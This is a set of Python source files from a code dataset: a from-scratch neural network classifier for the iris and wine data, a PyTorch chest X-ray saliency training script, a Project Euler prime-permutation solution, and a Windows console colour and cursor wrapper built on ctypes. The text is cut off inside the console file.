-*-\n\"\"\"\nCreated on Sat Oct 27 14:32:38 2018\n\n@author: jmezi\n\"\"\"\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom matplotlib.pyplot import plot, show, figure\n\nlayer_number = int(input(\"How many hidden layers would you like? \"))\nnode_number = []\nfor i in range(layer_number):\n node_number.append(int(input(\"How many nodes would you like for layer \"+str(i+1)+\"? \")))\nlearning_rate = float(input(\"What would you like the learning rate to be? \"))\n\nclass Classifier():\n def __init__(self,layer_number,node_number,learning_rate):\n self.learning_rate = learning_rate\n self.layer_number = layer_number\n self.node_number = node_number\n self.layers = []\n for i in range(layer_number+1):\n self.layers.append(Layer(node_number[i] + 1,node_number[i+1]))\n \n def fit(self, train_data, train_target):\n wrong = 1\n accuracy = 0\n k = 0\n l = 0\n repeats = 0\n accuracy2 = 0\n old_rate = self.learning_rate\n accuracy_data = []\n while k < 1000 and accuracy < 0.95:\n wrong = 0\n for i in range(len(train_target)):\n correct_guess = []\n for j in range(len(set(train_target))):\n if j == train_target[i]:\n correct_guess.append(1)\n else:\n correct_guess.append(0)\n guess = self.generate_guess(train_data[i])\n guess_index = list(guess[-1]).index(max(list(guess[-1])))\n if guess_index != train_target[i]:\n wrong += 1\n guess.append(np.asarray(correct_guess))\n self.back_propagate(guess)\n k += 1\n accuracy = (len(train_target) - wrong) / len(train_target)\n accuracy_data.append(accuracy)\n if abs(accuracy2 - accuracy) < 1e-4:\n repeats += 1\n else:\n repeats = 0\n accuracy2 = accuracy\n if repeats > 150 and accuracy < 0.75:\n old_rate = self.learning_rate\n self.learning_rate *= (1-accuracy)*10\n l = k + 5\n repeats = 0\n if k > l and self.learning_rate > old_rate and repeats < 5:\n self.learning_rate /= 2\n print(k)\n return accuracy_data\n \n def predict(self,test_data):\n prediction_array = []\n for i in range(len(test_data)):\n guess = self.generate_guess(test_data[i])\n prediction_array.append(list(guess[-1]).index(max(list(guess[-1]))))\n return np.asarray(prediction_array)\n \n def generate_guess(self,data_input):\n guess = []\n guess.append(data_input)\n for i in range(self.layer_number+1):\n guess[-1] = np.append(guess[-1],-1)\n guess.append(self.layers[i].node_output(guess[-1]))\n return 
guess\n\n def back_propagate(self,guess):\n error = self.generate_error(guess)\n self.update_weights(error,guess)\n \n def generate_error(self,guess):\n error = []\n guess[0] = np.delete(guess[0],-1)\n for i in range(len(guess) - 2):\n if i == 0:\n error.append(guess[-2]*(1-guess[-2])*(guess[-2] - guess[-1]))\n else:\n guess[-(i+2)] = np.delete(guess[-(i+2)],-1)\n error.append(guess[-(i+2)]*(1-guess[-(i+2)])*np.sum(np.dot(self.layers[-i].weights.T,error[-1])))\n error = np.flip(error)\n return error\n \n def update_weights(self,error,guess):\n for i in range(len(self.layers)):\n self.layers[i].update_layer_weights(error[i],guess[i],self.learning_rate)\n \nclass Layer():\n def __init__(self,input_number,output_number):\n self.weights = np.random.randint(-50,50, size=(output_number,input_number))/100\n \n def node_output(self,node_input):\n return 1/(1 + np.exp(- np.matmul(self.weights,node_input)))\n \n def update_layer_weights(self,error,guess,learning_rate):\n for i in range(len(self.weights)):\n self.weights[i] = self.weights[i] - learning_rate * error[i] * np.append(guess,-1)\n\niris = datasets.load_iris()\ntrain_data, test_data, train_target, test_target = train_test_split(iris.data, iris.target, test_size = 0.3)\ntrain_data = np.asarray(train_data)\ntrain_target = np.asarray(train_target)\n\nfor i in range(4):\n train_data[i] = (train_data[i] - np.mean(train_data[i]))/np.std(train_data[i])\n test_data[i] = (test_data[i] - np.mean(train_data[i]))/np.std(train_data[i])\nnode_number.append(len(set(train_target)))\nnode_number.insert(0,len(train_data[0]))\nclassifier = Classifier(layer_number,node_number,learning_rate)\naccuracy_data = classifier.fit(train_data,train_target)\nprediction = classifier.predict(test_data)\n\nright = 0\ni = 0\nwhile i < len(prediction):\n if prediction[i] == test_target[i]:\n right += 1\n \n i += 1\n\npercent_right = right / len(test_target)\nprint(percent_right)\n\nfigure(1)\nplot(accuracy_data)\nshow()\n\nlayer_number = int(input(\"How many hidden layers would you like? \"))\nnode_number = []\nfor i in range(layer_number):\n node_number.append(int(input(\"How many nodes would you like for layer \"+str(i+1)+\"? \")))\nlearning_rate = float(input(\"What would you like the learning rate to be? 
\"))\n\nwine = datasets.load_wine()\ntrain_data, test_data, train_target, test_target = train_test_split(wine.data, wine.target, test_size = 0.3)\ntrain_data = np.asarray(train_data)\ntrain_target = np.asarray(train_target)\n\nfor i in range(4):\n train_data[i] = (train_data[i] - np.mean(train_data[i]))/np.std(train_data[i])\n test_data[i] = (test_data[i] - np.mean(train_data[i]))/np.std(train_data[i])\nnode_number.append(len(set(train_target)))\nnode_number.insert(0,len(train_data[0]))\nclassifier = Classifier(layer_number,node_number,learning_rate)\naccuracy_data = classifier.fit(train_data,train_target)\nprediction = classifier.predict(test_data)\n\nright = 0\ni = 0\nwhile i < len(prediction):\n if prediction[i] == test_target[i]:\n right += 1\n \n i += 1\n\npercent_right = right / len(test_target)\nprint(percent_right)\n\nfigure(1)\nplot(accuracy_data)\nshow()\n","sub_path":"week06/prove7.py","file_name":"prove7.py","file_ext":"py","file_size_in_byte":6289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"241417889","text":"from __future__ import print_function, division\nfrom saliency_map_net import SaliencyMapNet, SaliencyUNet, L_cut, Saliency_simple, Saliency_noskip, Saliency_encoder\n\nfrom data_loader import ChexRays, RSNA_loader\n\n\nimport torch\nfrom torch.optim import lr_scheduler\nimport numpy as np\nfrom torchvision import transforms\nimport matplotlib.pyplot as plt\nimport time\nimport os\nimport copy\nfrom apex import amp\nfrom sklearn.metrics import roc_auc_score\n\nfrom knoedl import setup_experiment\nfrom knoedl.utils import dynamic_import\n\n\ndef main():\n # amp_handle = amp.init(enabled=True)\n params = setup_experiment(exp_type='training')\n # get base_dir from params file\n base_dir = params['base_dir']\n # note params file has to be given in training/ edit_configuration top right drop down menu\n\n # init logging\n from knoedl.log.tb_log import TbLogger as knoedl_TbLogger\n\n # read param file containing training parameters\n running_type = params['running_type']\n num_classes = params['model_params']['num_classes']\n batch_size = params['train']['batch_size']\n epochs = params['train']['epochs']\n patience = params['train']['patience']\n\n data_transforms = {\n 'train': transforms.Compose([\n transforms.ToPILImage(),\n transforms.RandomHorizontalFlip(),\n transforms.RandomAffine(degrees=5, translate=(0.05, 0.05), scale=(0.9, 1.1)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n\n 'val': transforms.Compose([\n transforms.ToPILImage(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n }\n\n #### Data Location ####\n if running_type == 'dev':\n data_dir = 'data/hymenoptera_data'\n root_dir = '/media/data1/max_m/thesis/chexray_dev/'\n dev_folder = 'images/'\n dev_csv_path = os.path.join(root_dir, 'Dev_data.csv')\n log_dir = root_dir\n\n #### Datasets and Dataloaders Generation ####\n image_datasets = {x: ChexRays(csv_dir=root_dir + '{}.csv'.format(x),\n root_dir=root_dir,\n folder=dev_folder,\n transform=data_transforms[x]) # changed to none / data_transforms[x]\n for x in ['train', 'val']}\n elif running_type == 'normal':\n server = params['server']\n # if server == '95':\n # root_dir = '/media/data2/data/ChestXray14/small/data'\n # folder = 'images'\n # elif server =='99':\n # root_dir = '/media/data2/data/ChestXray-NIHCC'\n # folder = 'images/'\n\n csv_dir = 
'/media/data1/max_m/thesis/RSNA/csv_files/K_fold/unique_pids'\n root_dir = '/media/data2/data/rsna-pneumonia-detection-challenge'\n folder = 'train_images_med_png'\n log_dir = '/media/data1/max_m/logs'\n split_names = {'train': params['split_names'][0], 'val': params['split_names'][1]}\n\n image_datasets = {x: RSNA_loader(csv_dir=os.path.join(csv_dir, split_names[x]),\n root_dir=root_dir,\n folder=folder,\n num_classes=num_classes,\n transform=data_transforms[x]) # changed to none / data_transforms[x]\n for x in ['train', 'val']}\n\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=batch_size,\n shuffle=True,\n num_workers=4) for x in ['train', 'val']}\n\n # check if datasets contain the same classes\n dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'val']}\n\n class_names = {x: image_datasets[x].classes for x in ['train', 'val']}\n assert class_names['train'] == class_names[\n 'val'], 'validation set does not contain the same classes as training set.' \\\n 'validation classes = {}, training classes = {}' \\\n .format(class_names['train'], class_names['val'])\n\n\n #### device assignment ####\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n #### model instantiation, based on architecture mode ####\n model_mode = params['model_params']['model_mode']\n if model_mode == 'saliency':\n # from saliency_map_net import SaliencyMapNet\n model = SaliencyMapNet(num_classes=num_classes,\n gr=32,\n resnet_backbone='ResNet50',\n dense_config='normal')\n elif model_mode == 'unet':\n model = SaliencyUNet(num_classes=num_classes,\n resnet_backbone='ResNet50')\n elif model_mode == 'cut':\n model = L_cut(num_classes=num_classes,\n resnet_backbone='ResNet50')\n elif 'simple' in model_mode:\n if '1' in model_mode:\n model = Saliency_simple(num_classes=num_classes,\n resnet_backbone='ResNet50', mode='mode1')\n elif '2' in model_mode:\n model = Saliency_simple(num_classes=num_classes,\n resnet_backbone='ResNet50', mode='mode2')\n else:\n model = Saliency_simple(num_classes=num_classes,\n resnet_backbone='ResNet50')\n elif model_mode == 'noskip':\n model = Saliency_noskip(num_classes=num_classes,\n resnet_backbone='ResNet50')\n elif model_mode == 'encoder':\n model = Saliency_encoder(num_classes=num_classes,\n resnet_backbone='ResNet50')\n model = model.to(device)\n\n #### training ####\n # when training on RSNA use softmax and NLLLoss\n loss_type = dynamic_import(['torch.nn'], params['train']['loss_type'], 'loss')\n loss = loss_type(**params['train']['loss_params'])\n\n optim_type = dynamic_import(['torch.optim'], params['train']['optim_type'], 'optimizer')\n optim = optim_type(model.parameters(), **params['train']['optim_params'])\n\n\n # APEX init\n model, optim = amp.initialize(model, optim, opt_level='O1')\n step_size = params['train']['lr_decay']\n gamma = params['train']['gamma']\n exp_lr_scheduler = lr_scheduler.StepLR(optim, step_size=step_size, gamma=gamma)\n\n\n #### Initialize model savers and tensorboard logging.####\n # Note that knoedl automatically creates logs for all .py files, and the console log and knoedl version\n knoedl_tb_logger = knoedl_TbLogger(base_dir, count_steps=True)\n\n #create a models directory in the base_dir that is created by knoedl\n # models_dir is used to save the best models, and a model from each epoch\n models_dir = os.path.join(base_dir, 'models/')\n os.makedirs(models_dir, exist_ok=True)\n\n #### load model params from previous training ####\n load_pretrained = params['load_pretrained']\n 
best_dir = params['best_dir']\n best_from = os.path.join(log_dir, best_dir)\n if load_pretrained:\n checkpoint = torch.load(best_from)\n model.load_state_dict(checkpoint['model_state_dict'], strict=False)\n # optim.load_state_dict(checkpoint['optimizer_state_dict'])\n\n ## freeze weights:\n # for child in model.pretrained_resnet.children():\n # for param in child.parameters():\n # param.requires_grad = False\n\n # model.eval()\n # - or -\n model.train()\n\n # todo : debugging training\n result = train_model(model,\n loss,\n optim,\n scheduler=exp_lr_scheduler,\n patience=patience,\n device=device,\n dataloaders=dataloaders,\n class_names=class_names,\n dataset_sizes=dataset_sizes,\n root_dir=root_dir,\n epochs=epochs,\n knoedl_tb_logger=knoedl_tb_logger,\n log_dir=models_dir,\n params=params)\n\n # visualize_model(model, dataloaders, device, class_names, num_images=4)\n\n return result\n\n\ndef show(tensor, title=None, save_location=None):\n inp = tensor.numpy().transpose((1, 2, 0))\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n plt.imshow(inp)\n if title is not None:\n plt.title(title)\n\n if save_location is not None:\n save_loc = os.path.join('/media/data1/max_m/thesis/saved_figures/', save_location) #uncomment if image is to be saved\n plt.savefig(save_loc)\n else:\n plt.pause(0.001) # comment out if image is to be saved\n\n\n#todo: transform list of labels into one hot encoding, add this to ChexRay as a class method\ndef convert_labels_to_tensor(class_names, sample):\n labels_dict = {label: idx for idx, label in enumerate(class_names['train'])}\n predictions = sample['annotations']['Finding Labels']\n # convert sample labels to list of labels\n\n idx = []\n batch_size = sample['image'].shape[0]\n num_classes = len(class_names['train'])\n one_hot = torch.zeros((batch_size, num_classes))\n for batch in range(batch_size):\n idx = []\n if isinstance(predictions[batch], str):\n predictions[batch] = [predictions[batch]]\n for i, label in enumerate(predictions[batch]):\n idx.append(labels_dict[label])\n\n one_hot[batch, idx] = 1\n return one_hot\n\n\n## TOdo: start a training with basic parameters, little data augmentation etc. 
% done\n# define training function\ndef train_model(model,\n criterion,\n optimizer,\n scheduler,\n patience,\n device,\n dataloaders,\n class_names,\n dataset_sizes,\n root_dir,\n knoedl_tb_logger,\n epochs,\n log_dir,\n params,\n ):\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n best_roc_auc = 0.0\n\n\n with knoedl_tb_logger:\n for epoch in range(0, epochs):\n print('Epoch {}/{}'.format(epoch, epochs - 1))\n print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train() # Set model to training mode\n # update learning_rate scheduler:\n scheduler.step()\n\n else:\n model.eval() # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n counter = 0\n\n if phase == 'val':\n labels_epoch = []\n outs_epoch = []\n\n # running_roc_auc_score = 0.0\n # running_add = 0.0\n ## use a array to save the outputs\n\n # Iterate over data.\n if phase == 'val':\n print('Wait !')\n for i, sample in enumerate(dataloaders[phase]):\n inputs = sample['image'].to(device)\n\n # formatting labels, where multiple labels are present, create a list\n # for roc auc score required in one hot labels\n labels = sample['annotations'].squeeze()\n #convert labels to int encoding if loss function is CrossEntropyLoss\n if len(labels.shape) == 2:\n labels_int = labels.max(1)[1]\n else:\n labels_int = labels.max()\n\n\n labels = labels.to(device)\n labels_int = labels_int.to(device)\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == 'train'):\n _, outputs = model(inputs)\n #change labels passed to loss if BCELoss or NLLLoss\n if params['train']['loss_type'] == 'NLLLoss':\n labels = labels.type(dtype=torch.long)\n if labels_int.dim() != 0:\n loss = criterion(outputs, labels_int) # assumes that labels are given as one hot encoded\n else:\n labels_int = labels_int.unsqueeze(0).type(dtype=torch.long)\n loss = criterion(outputs, labels_int)\n else:\n loss = criterion(outputs, labels)\n\n # backward + optimize only if in training phase\n if phase == 'train':\n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n\n optimizer.step()\n\n if phase == 'val':\n # append outputs and labels of batch to overall cached outputs and labels of epoch\n with torch.no_grad():\n outs_epoch.append(outputs.cpu().numpy())\n # if BCELoss, labels are one hot encoded\n labels_epoch.append(labels.cpu().numpy())\n\n # logging...\n if i % 100 == 0:\n if phase =='val':\n print('current i is: {}/{} \\n'\n ' current loss is {} \\n'.format(i,\n len(dataloaders[phase].dataset)/\n dataloaders[phase].batch_size,\n loss.item(),))\n else:\n print('current i is: {}/{} \\n'\n ' current loss is {}'.format(i,\n len(dataloaders[phase].dataset)/\n dataloaders[phase].batch_size,\n loss.item()))\n running_loss += loss.item() * inputs.size(0)\n\n #calculate loss\n epoch_loss = running_loss / dataset_sizes[phase]\n\n # write TensorBoard output...\n if phase == 'val':\n # save predicted classes for statistics\n outs_epoch = np.concatenate(outs_epoch, axis=0)\n labels_epoch = np.concatenate(labels_epoch, axis=0)\n\n roc_auc = roc_auc_score(y_true=labels_epoch, y_score=outs_epoch, average=\"macro\")\n\n if model.pooling.beta.shape[0] == 3:\n current_lr = optimizer.param_groups[0]['lr']\n res_list = [model.pooling.beta[0], model.pooling.beta[1], model.pooling.beta[2], current_lr, epoch, epoch_loss, roc_auc]\n tb_tags = 
['beta0', 'beta1', 'beta2', 'lr', 'epoch', 'val_epoch_loss', 'roc_auc']\n knoedl_tb_logger.add_scalars(tb_tags, res_list, step=epoch)\n print('{} Loss: {:.4f} roc_auc: {:.4f}'.format(\n phase, epoch_loss, roc_auc))\n else:\n current_lr = optimizer.param_groups[0]['lr']\n res_list = [model.pooling.beta, current_lr, epoch, epoch_loss, roc_auc]\n tb_tags = ['beta0', 'lr', 'epoch', 'val_epoch_loss', 'roc_auc']\n knoedl_tb_logger.add_scalars(tb_tags, res_list, step=epoch)\n print('{} Loss: {:.4f} roc_auc: {:.4f}'.format(\n phase, epoch_loss, roc_auc))\n\n elif phase == 'train':\n res_list = [epoch, epoch_loss]\n tb_tags = ['epoch', 'train_epoch_loss']\n knoedl_tb_logger.add_scalars(tb_tags, res_list, step=epoch)\n print('{} Loss: {:.4f}'.format(\n phase, epoch_loss))\n\n\n if roc_auc > best_roc_auc:\n best_roc_auc = roc_auc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n # save model weights to file\n save_at = os.path.join(log_dir, 'checkpoint{}_{}.pth.tar'.format(epoch, phase))\n # torch.save(model.state_dict(), save_at)\n\n # save more checkpoints\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': loss\n }, save_at)\n\n counter = 0\n else:\n counter += 1\n\n if counter >= patience:\n break\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Best roc_auc: {:4f}'.format(best_roc_auc))\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n save_best = os.path.join(log_dir, 'best.pth.tar')\n\n # save the best model\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': loss\n }, save_best)\n\n return model\n\nif __name__ == '__main__':\n main()\n\nprint('done')\n\n\n","sub_path":"classification_training.py","file_name":"classification_training.py","file_ext":"py","file_size_in_byte":18072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"410368410","text":"#! 
/usr/bin/env python3\n\n# Problem 49 - Prime permutations\n#\n# The arithmetic sequence, 1487, 4817, 8147, in which each of the terms\n# increases by 3330, is unusual in two ways: (i) each of the three terms\n# are prime, and, (ii) each of the 4-digit numbers are permutations of one\n# another.\n#\n# There are no arithmetic sequences made up of three 1-, 2-, or 3-digit\n# primes, exhibiting this property, but there is one other 4-digit increasing\n# sequence.\n#\n# What 12-digit number do you form by concatenating the three terms in this\n# sequence?\n\nimport unittest\n\nfrom util import *\n\ndef longestPrimePermSeq(digits):\n allPrimePerms = primePerms(digits)\n maxSeqLen, maxSeqs = 0, []\n for p, ps in allPrimePerms.items():\n index = seqToDict(ps)\n a = ps[0]\n for b in ps[1:]:\n d = b - a\n it = a\n seq = [it]\n while it + d in index:\n seq.append(it + d)\n it = ps[index[it + d]]\n if len(seq) == maxSeqLen:\n maxSeqs.append(seq)\n if len(seq) > maxSeqLen:\n maxSeqLen = len(seq)\n maxSeqs = [seq]\n return maxSeqs\n\ndef primePerms(digits):\n limit = int('9' * digits)\n primeList = [p for p in primes(limit) if numDigits(p) == digits]\n primeSet = set(primeList)\n\n allPerms = {}\n for i, p in enumerate(primeList):\n allPerms[p] = set()\n for perm in perms(intToSeq(p)):\n q = seqToInt(perm)\n if q in primeSet and q >= p:\n allPerms[p].add(q)\n allPerms[p] = sorted(allPerms[p])\n return allPerms\n\ndef seqToDict(seq):\n index = {}\n for i, n in enumerate(seq):\n index[n] = i\n return index\n\nclass Test(unittest.TestCase):\n def test_problem049(self):\n seqs = sorted([seqToInt(seq) for seq in longestPrimePermSeq(4)])\n self.assertEqual(seqs, [148748178147, 296962999629])\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"problem049.py","file_name":"problem049.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"4479483","text":"#\n# Console.py\n# Advanced console capabilites on Windows\n#\n# Jonatan H Sundqvist\n# July 30 2014\n#\n\n# TODO | - Look for portable solutions, dependency checks (cf. curses)\n#\t\t - Decide on API argument scheme (X, Y, tuple, complex, either or, etc)\n#\t\t \t-- Decorator for overloads (?)\n#\t\t - Proper Unicode handling, encoding queries\n#\t\t - Saving output\n#\t\t - Sort methods in a logical order (High-level API, Low-level API, internal methods, auxiliary internal methods, etc.)\n#\t\t - Position printing (printAt, fill, etc.)\n\n# SPEC | - \n#\t\t -\n\n\nimport tkinter as tk\n\nfrom ctypes import *\nfrom itertools import cycle, takewhile\n\nfrom sys import stdout\nfrom time import sleep\nfrom random import choice\nfrom collections import namedtuple\n\nif __name__ == '__main__':\n\tfrom WinTypes import *\nelse:\n\tfrom SwiftUtils.WinTypes import *\t# (?) 
# TODO: Fix import error (different behaviour when including this module from another script) (✓)\n# from constants import * \t# (?)\n\n\nclass Colours:\n\tBLACK \t= 0x0\n\tBLUE \t= 0x1\n\tGREEN \t= 0x2\n\tCYAN \t= 0x3\n\tBLOOD \t= 0x4\n\tPURPLE \t= 0x5\n\tGOLD \t= 0x6\n\tBONE \t= 0x7\n\tGREY \t= 0x8\n\tOCEAN \t= 0x9\n\tGRASS \t= 0xA\n\tLAGOON \t= 0xB\n\tRED \t= 0xC\n\tPINK \t= 0xD\n\tYELLOW \t= 0xE\n\tWHITE \t= 0xF\n\n\nclass Console():\n\n\t'''\n\tWraps the console API for Windows,\n\tproviding a simple interface for \n\tadvanced text-based interaction.\n\n\t'''\n\n\tdef __init__(self):\n\n\t\t''' '''\n\n\t\t# Acquire handle\n\t\twindll.Kernel32.GetStdHandle.restype = c_ulong\n\t\tself.HANDLE = c_ulong(0XFFFFFFF5)\n\t\tself.hStdout = windll.Kernel32.GetStdHandle(self.HANDLE)\n\n\t\t# Initialize\n\t\tself.title('Labyrinthian')\n\n\t\t# Initialize colours\n\t\tself.bg = 0x00 # Highest bits indicate bg?\n\t\tself.fg = 0x00 # Lowest bits indicate fg?\n\n\t\t# Initialize buffer attributes\n\t\t# TODO: Cursor object (eg. pos, visible, etc.) (?)\n\t\tself.size \t= None # Buffer size (in characters)\n\t\tself.pos \t= 0, 0 # Cursor position (character offset from top left corner)\n\n\t\tself.updateBufferInfo()\n\n\n\tdef colour(self, bg=None, fg=None):\n\n\t\t''' Returns or sets foreground and background colour '''\n\n\t\tif (bg is None) and (fg is None):\n\t\t\treturn (self.bg << 4) + (self.fg)\n\t\t\n\t\tif bg is not None:\n\t\t\tassert isinstance(bg, int) and (0x0 <= bg <= 0xF)\n\t\t\tself.bg = bg\n\t\t\n\t\tif fg is not None:\n\t\t\tassert isinstance(fg, int) and (0x0 <= fg <= 0xF)\n\t\t\tself.fg = fg\n\n\t\twindll.Kernel32.SetConsoleTextAttribute(self.hStdout, (self.bg << 4) + (self.fg))\n\n\n\tdef cursor(self, x=None, y=None):\n\n\t\t''' Sets or retrieves the cursor position '''\n\n\t\tself.updateBufferInfo()\n\t\tstdout.flush()\n\t\t#print('X: %d\\n%sY: %d' % (self.pos[0], ' ' * (self.pos[0]), self.pos[1]))\n\t\t\n\t\tif x is None and y is None:\n\t\t\t# TODO: Make sure self.pos is up to date (cf. print)\n\t\t\treturn self.pos\n\n\t\tif x is not None:\n\t\t\tself.pos = x, self.pos[1]\n\n\t\tif y is not None:\n\t\t\tself.pos = self.pos[0], y\n\n\t\twindll.Kernel32.SetConsoleCursorPosition(self.hStdout, COORD(*self.pos))\n\n\n\tdef charAt(self, X, Y, char=None, bg=None, fg=None):\n\n\t\t''' Sets or retrieves the character at the specified position '''\n\n\t\t# TODO: Retrieve colour data as well (cf. 
CHAR_INFO)\n\t\tif char is None:\n\t\t\treturn 0 # Char at X,Y\n\t\telse:\n\t\t\traise NotImplementedError # Set char at X, Y\n\n\n\tdef view(self, section, contents=None, bg=None, fg=None):\n\n\t\t''' Sets or retrieves a rectangular section of the console buffer '''\n\n\t\traise NotImplementedError\n\n\n\tdef updateBufferInfo(self):\n\n\t\t''' '''\n\n\t\tinfo = BUFFERINFO()\n\t\twindll.Kernel32.GetConsoleScreenBufferInfo(self.hStdout, byref(info)) # TODO: Make sure this is correct\n\t\t\n\t\tself.pos \t= (info.dwCursorPosition.X, info.dwCursorPosition.Y)\n\t\tassert self.pos == (info.dwCursorPosition.X, info.dwCursorPosition.Y)\n\t\tself.size \t= info.dwSize.X, info.dwSize.Y\n\n\n\tdef pullEvent(self):\n\n\t\t''' '''\n\n\t\traise NotImplementedError\n\n\t\tnumEvents = DWORD(0)\n\t\twindll.Kernel32.GetNumberOfConsoleInputEvents(self.hStdout, byref(numEvents))\n\t\trecord = INPUT_RECORD()\n\t\tlength = DWORD(1)\n\t\twindll.Kernel32.GetConsoleScreenBufferInfo(self.hStdout)\n\n\n\tdef title(self, title=None):\n\n\t\t''' Returns or sets title '''\n\n\t\t# NOTE: Stored as self._title; assigning to self.title would shadow this method\n\t\tif title is None:\n\t\t\treturn self._title\n\t\telse:\n\t\t\tself._title = title\n\t\t\twindll.Kernel32.SetConsoleTitleW(title)\n\n\n\tdef moveCursor(self, x, y):\n\n\t\t''' Moves the cursor relative to its current position '''\n\n\t\tself.cursor(x+self.pos[0], y+self.pos[1])\n\n\n\tdef putTokens(self, *tokens):\n\n\t\t''' '''\n\n\t\tfor token in tokens:\n\t\t\tif isinstance(token, str):\n\t\t\t\tprint(token, end=' ')\n\t\t\telse:\n\t\t\t\tstdout.flush() # Have to flush the buffer for the colour change to take effect. Printing a newline also works.\n\t\t\t\tself.colour(fg=token)\n\n\n\tdef colourPrint(self, string):\n\t\ttokens = [word if not hasattr(Colours, word) else getattr(Colours, word) for word in string.split()]\n\t\tself.putTokens(*tokens)\n\n\n\tdef parseMarkup(self, markup):\n\n\t\t''' '''\n\n\t\t# TODO: Parse markup\n\t\t# TODO: Escapes for syntactic characters\n\t\t# TODO: Default formatting for plain text\n\t\t# TODO: Debugging, error handling\n\t\t# TODO: Optimise, extract setup code (eg. definitions)\n\t\t# TODO: Use regex or library (?)\n\t\t# NOTE: Nested tags are currently not supported\n\t\t\n\t\tToken = namedtuple('Token', 'fg bg text')\n\t\ttokens = []\n\n\t\t# Default values for attributes\n\t\tdefaults = {\n\t\t\t'fg': 'WHITE',\n\t\t\t'bg': 'BLACK'\n\t\t}\n\n\t\tdef colour(prop, frmt):\n\t\t\t''' '''\n\t\t\t# TODO: Find a more general name (eg. parseAttributes)\n\t\t\t# TODO: Allow customisation via kwargs (?)\n\t\t\tif prop not in frmt:\n\t\t\t\treturn defaults[prop]\n\t\t\telse:\n\t\t\t\t# TODO: Use colour aliases when printing tokens (?)\n\t\t\t\t# TODO: More attributes (...)\n\t\t\t\t# This sub-parser only consumes upper-case letters (since it's trying to extract a Colour constant)\n\t\t\t\t#return getattr(Colours, ''.join(takewhile(lambda c: c.isupper(), frmt[frmt.index(prop)+3:])))\n\t\t\t\t# This generalised sub-parser extracts ANY value token and leaves the interpretation to the caller\n\t\t\t\t# NOTE: Assumes the delimiter is a space. 
Easily customised.\n\t\t\t\treturn ''.join(takewhile(lambda c: c not in ' >', frmt[frmt.index(prop)+3:]))\n\n\t\t\n\t\twhile len(markup) > 0:\n\t\t\tif markup.startswith('<'):\n\t\t\t\tbegin \t= markup.index('<') # Should always be 0 within this branch\n\t\t\t\tend \t= markup.index('>') # Last index of formatting tag\n\t\t\t\tfrmt \t= markup[begin+1:end]\n\n\t\t\t\tclose \t= end + 1 + markup[end+1:].index('') # Skip formatting tag when looking for closing tag (unnecessary optimization (?))\n\t\t\t\ttext \t= markup[end+1:close]\t\t\t\t\t# Extract text between formatting tag and end tag\n\n\t\t\t\tmarkup = markup[close+len(''):] # Increment the pointer (so to speak)\n\n\t\t\t\t# TODO: Use takeWhile or regex (?)\n\t\t\t\t#fg = Colours.WHITE if 'fg=' not in frmt else getattr(Colours, frmt[]) # TODO: Allow hex colours too (?)\n\t\t\t\t#bg = Colours.BLACK if 'bg=' not in frmt else getattr(Colours, frmt[frmt.index('bg=')+3:(frmt[frmt.index('bg=')+3:].index())])\n\t\t\t\tfg = colour('fg', frmt)\n\t\t\t\tbg = colour('bg', frmt)\n\t\t\t\ttokens.append(Token(fg, bg, text))\n\t\t\telse:\n\t\t\t\t# Token does not have tags\n\t\t\t\tend = markup.index('<') if '<' in markup else len(markup)\n\t\t\t\ttokens.append(Token(defaults['fg'], defaults['bg'], markup[:end]))\n\t\t\t\tmarkup = markup[end:]\n\n\t\treturn tokens\n\t\t#return 'Hello thereThis is white text. IMPORTANT!'\n\n\n\tdef printMarkup(self, markup):\n\t\t\n\t\t''' '''\n\t\t# NOTE: Currently incompatible with customised markup\n\t\tfor token in self.parseMarkup(markup):\n\t\t\tself.putColoured(char=token.text, fg=getattr(Colours, token.fg), bg=getattr(Colours,token.bg))\n\n\t\t# TODO: Reset formatting afterwards (?)\n\n\n\tdef putColoured(self, char, fg=None, bg=None):\n\t\t''' Prints a coloured string '''\n\t\t# TODO: Rename char argument\n\t\tstdout.flush()\n\t\tself.colour(bg=bg, fg=fg)\n\t\tprint(char, end='')\n\t\tstdout.flush()\n\n\n\ndef main():\n\n\tconsole = Console()\n\n\tconsole.colourPrint('RED ERROR! WHITE ! 
